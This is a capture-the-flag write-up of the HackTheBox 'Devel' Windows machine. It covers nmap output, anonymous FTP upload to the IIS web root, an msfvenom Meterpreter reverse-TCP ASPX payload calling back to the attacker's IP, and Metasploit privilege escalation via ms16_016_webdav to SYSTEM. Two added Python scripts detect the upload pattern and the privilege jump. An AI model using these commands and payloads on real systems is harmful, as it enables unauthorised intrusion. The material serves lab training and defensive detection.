Devel @ hackthebox

Devel is a relatively easy HackTheBox Windows machine, which can be done almost all the way with Metasploit.

Enumeration

Let's run Nmap with nmap -sC -sT -oA nmap -n 10.10.10.5 (to check what each option does, simply run nmap --help).

┌─[✗]─[luka@parrot]─[~/Desktop/htb/Devel/nmap]
└──╼ $sudo nmap -sC -sT -oA nmap -n 10.10.10.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-19 20:32 CET
Nmap scan report for 10.10.10.5
Host is up (0.028s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
| 03-21-19 10:13PM 914405 ipsec.aspx
| 03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|   SYST: Windows_NT
80/tcp open http
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS7
Nmap done: 1 IP address (1 host up) scanned in 6.09 seconds

Before checking the FTP server on the Devel machine it would normally be wise to start gobuster/dirbuster in the background. It didn't find anything though.

We can log in to the FTP server with anonymous credentials (username anonymous, any password). We have write privileges as well.


A test file was transferred successfully, and the uploaded file is also visible on the web server in the browser, so the FTP root is served by IIS.


Exploitation / Initial Foothold

We can obviously upload and run .aspx files, so let's create a payload with msfvenom. I used the shikata_ga_nai encoder, which doesn't really help much if some kind of protection like antivirus/Windows Defender is active. I will use Meterpreter for this box.

┌─[root@parrot]─[/home/luka/Desktop/htb/Devel/payload]
└──╼ #msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.5 LHOST=10.10.14.68 LPORT=5555 -e x86/shikata_ga_nai -o payload.aspx -f aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of aspx file: 2960 bytes
Saved as: payload.aspx

The payload was uploaded to the server with "put payload.aspx" in the FTP client.
Requesting it in the browser executes it. If the handler was set up correctly, we should see a new session in Meterpreter.
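The foothold above works because the FTP root is also the IIS web root: an anonymous upload of an .aspx file followed by an HTTP request for the same file is the whole attack chain. As an added example (not part of the original writeup, and not Devel's real logs), the script below reads constructed W3C-style FTP and HTTP log lines and correlates an anonymous STOR of a server-side-executable file with a later GET of that path. The field layout, hosts, timestamps and the one-hour window are assumptions for illustration; real IIS logs carry more columns.

```python
"""Correlate anonymous FTP uploads with later web requests for the same file.

Added example for this writeup, not code from the original post. Log lines,
field layout and hosts below are constructed assumptions for illustration.
"""
from datetime import datetime, timedelta

# Constructed FTP log (not from the box). Simplified W3C extended format.
FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2019-03-21 22:10:41 10.10.14.68 anonymous USER anonymous 331
2019-03-21 22:10:42 10.10.14.68 anonymous PASS *** 230
2019-03-21 22:11:05 10.10.14.68 anonymous STOR /test.txt 226
2019-03-21 22:13:02 10.10.14.68 anonymous STOR /payload.aspx 226
2019-03-21 22:20:15 10.10.14.70 webadmin STOR /iisstart.htm 226
"""

# Constructed HTTP log for the same web root (not from the box).
HTTP_LOG = """#Fields: date time c-ip cs-method cs-uri-stem sc-status
2019-03-21 22:11:30 10.10.14.68 GET /test.txt 200
2019-03-21 22:13:40 10.10.14.68 GET /payload.aspx 200
2019-03-21 22:21:00 10.10.14.70 GET /iisstart.htm 200
"""

# Extensions IIS hands to a script engine instead of serving as static content.
SERVER_SIDE_EXT = (".aspx", ".asp", ".ashx", ".asmx", ".asa", ".cer")
# Account names that mean "unauthenticated" in an FTP log (assumption).
ANONYMOUS_USERS = {"anonymous", "ftp", "-"}


def parse_w3c(text):
    """Turn W3C-style lines into dicts keyed by the #Fields header, with a ts."""
    fields, rows = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line; skip rather than guess
        row = dict(zip(fields, parts))
        row["ts"] = datetime.strptime(row["date"] + " " + row["time"],
                                      "%Y-%m-%d %H:%M:%S")
        rows.append(row)
    return rows


def anonymous_uploads(ftp_rows):
    """Successful STOR commands issued by an unauthenticated FTP user."""
    return [r for r in ftp_rows
            if r["cs-method"] == "STOR"
            and r["cs-username"].lower() in ANONYMOUS_USERS
            and r["sc-status"].startswith("2")]


def correlate(ftp_text, http_text, window=timedelta(hours=1)):
    """Alert when an anonymously uploaded path is requested over HTTP soon after.

    Severity is 'high' when the file has a server-side-executable extension
    (the web server would run it), 'medium' for any other anonymous upload
    that becomes web-reachable.
    """
    ftp_rows = parse_w3c(ftp_text)
    http_rows = parse_w3c(http_text)
    alerts = []
    for up in anonymous_uploads(ftp_rows):
        path = up["cs-uri-stem"].lower()
        executable = path.endswith(SERVER_SIDE_EXT)
        for req in http_rows:
            if req["cs-uri-stem"].lower() != path:
                continue
            delta = req["ts"] - up["ts"]
            if timedelta(0) <= delta <= window:
                alerts.append({
                    "file": up["cs-uri-stem"],
                    "uploader": up["c-ip"],
                    "requester": req["c-ip"],
                    "seconds_to_request": int(delta.total_seconds()),
                    "severity": "high" if executable else "medium",
                })
    return alerts


if __name__ == "__main__":
    for alert in correlate(FTP_LOG, HTTP_LOG):
        print(alert)
```

The authenticated webadmin upload of iisstart.htm is deliberately not flagged: the signal here is write access without authentication landing in a directory the web server executes from, which is exactly the condition the enumeration above found. Disabling anonymous write on the FTP site, or pointing the FTP root away from the IIS web root, removes the condition entirely.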

meterpreter > sysinfo
Computer : DEVEL
OS : Windows 7 (Build 7600).
Architecture : x86
System Language : el_GR
Domain : HTB
Logged On Users : 0
Meterpreter : x86/windows
meterpreter > getuid
Server username: IIS APPPOOL\Web

Privilege Escalation

Since this is an unpatched Windows 7 system (build 7600), there is more than one option for escalating privileges. One way is to use the local exploit suggester module from Metasploit: "use post/multi/recon/local_exploit_suggester"

msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

Another way is a more granular search, which also shows each exploit's rank and can make the choice easier:
"search platform:windows type:exploit arch:x86 -S privilege"


I used the exploit/windows/local/ms16_016_webdav exploit for privilege escalation.

msf5 exploit(windows/local/ms16_016_webdav) > run
[*] Started reverse TCP handler on 192.168.0.190:4444
[*] Launching notepad to host the exploit...
[+] Process 3068 launched.
[*] Reflectively injecting the exploit DLL into 3068...
[*] Exploit injected ... injecting payload into 3068...
[*] Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.

I ran ps in Meterpreter; the exploit above created a new process, notepad.exe, running as SYSTEM.

 PID   PPID  Name         Arch  Session  User                 Path
 3068  2096  notepad.exe  x86   0        NT AUTHORITY\SYSTEM  C:\Windows\system32\notepad.exe
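From the defender's side, the interesting fact in that ps line is a SYSTEM process whose lineage leads back to a low-privilege IIS application pool identity. The following is an added example (not from the writeup) that walks a process table of the kind Meterpreter's ps prints and flags exactly that ancestry mismatch. The process tree below is constructed: the pids echo the writeup's 2052 and 3068, but the parent relationships, the svchost.exe/w3wp.exe chain and the extra processes are assumptions for illustration, not observations from the box.

```python
"""Flag SYSTEM processes descended from a low-privilege IIS app pool identity.

Added example for this writeup, not code from the original post. The process
table is constructed; it loosely mirrors the ps columns shown above but the
tree itself is an assumption for illustration.
"""

SYSTEM = "NT AUTHORITY\\SYSTEM"
# Identities that should never be the ancestor of a new SYSTEM process
# through ordinary means (assumption for this example).
LOW_PRIV_PREFIXES = (
    "IIS APPPOOL\\",
    "NT AUTHORITY\\NETWORK SERVICE",
    "NT AUTHORITY\\LOCAL SERVICE",
)

# Constructed process list: (pid, ppid, name, user). Not real Devel output.
PROCESS_TABLE = [
    (4,    0,    "System",       SYSTEM),
    (380,  4,    "smss.exe",     SYSTEM),
    (460,  380,  "wininit.exe",  SYSTEM),
    (560,  460,  "services.exe", SYSTEM),
    (1420, 560,  "svchost.exe",  SYSTEM),              # hosts WAS, starts w3wp
    (2052, 1420, "w3wp.exe",     "IIS APPPOOL\\Web"),  # the app pool worker
    (2444, 2052, "cmd.exe",      "IIS APPPOOL\\Web"),  # expected: same identity
    (3068, 2052, "notepad.exe",  SYSTEM),              # SYSTEM child of w3wp
]


def build_index(table):
    """Map pid -> record dict so parents can be looked up in O(1)."""
    return {pid: {"pid": pid, "ppid": ppid, "name": name, "user": user}
            for pid, ppid, name, user in table}


def ancestors(by_pid, pid):
    """Yield parent records from nearest to root; stops on cycles or gaps."""
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None:
        ppid = cur["ppid"]
        if ppid in seen or ppid not in by_pid:
            return  # pid reuse can create loops in a snapshot; don't spin
        seen.add(ppid)
        cur = by_pid[ppid]
        yield cur


def is_low_priv(user):
    return user.upper().startswith(tuple(p.upper() for p in LOW_PRIV_PREFIXES))


def find_escalations(table):
    """Return one alert per SYSTEM process whose nearest low-priv ancestor exists.

    A SYSTEM process that descends only from other SYSTEM processes (services,
    the boot chain) is normal; one that descends from an app pool worker is
    the shape produced by a local exploit run from a web shell.
    """
    by_pid = build_index(table)
    alerts = []
    for rec in by_pid.values():
        if rec["user"] != SYSTEM:
            continue
        for anc in ancestors(by_pid, rec["pid"]):
            if is_low_priv(anc["user"]):
                alerts.append({
                    "pid": rec["pid"],
                    "name": rec["name"],
                    "via_pid": anc["pid"],
                    "via_name": anc["name"],
                    "via_user": anc["user"],
                })
                break  # nearest low-priv ancestor is enough to explain it
    return alerts


if __name__ == "__main__":
    for alert in find_escalations(PROCESS_TABLE):
        print(alert)
```

The cmd.exe child of w3wp.exe is not flagged because it runs as the same app pool identity; the check is about the identity jump, not about which binaries the app pool spawns. On a live host the same logic applies to Sysmon or Security event process-creation records, where the parent pid and both user fields are available without a memory snapshot.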

I was able to migrate into that process and obtain SYSTEM privileges with getsystem.

meterpreter > migrate 3068
[*] Migrating from 2052 to 3068...
zlib(finalizer): the stream was freed prematurely.
[*] Migration completed successfully.
meterpreter > getsystem
…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

To switch from Meterpreter to a system shell, simply type shell at the Meterpreter prompt; Ctrl+Z backgrounds the shell channel and takes you back to Meterpreter.

c:\Users\babis\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1
Directory of c:\Users\babis\Desktop
18/03/2017 01:14 .
18/03/2017 01:14 ..
18/03/2017 01:18 32 user.txt.txt
1 File(s) 32 bytes
2 Dir(s) 24.573.169.664 bytes free
c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
*deleted*

Directory of c:\Users\Administrator\Desktop
18/03/2017 01:17 .
18/03/2017 01:17 ..
18/03/2017 01:17 32 root.txt.txt
1 File(s) 32 bytes
2 Dir(s) 24.573.169.664 bytes free
c:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
*deleted*

We've now got SYSTEM privileges on the box and both flags can be read.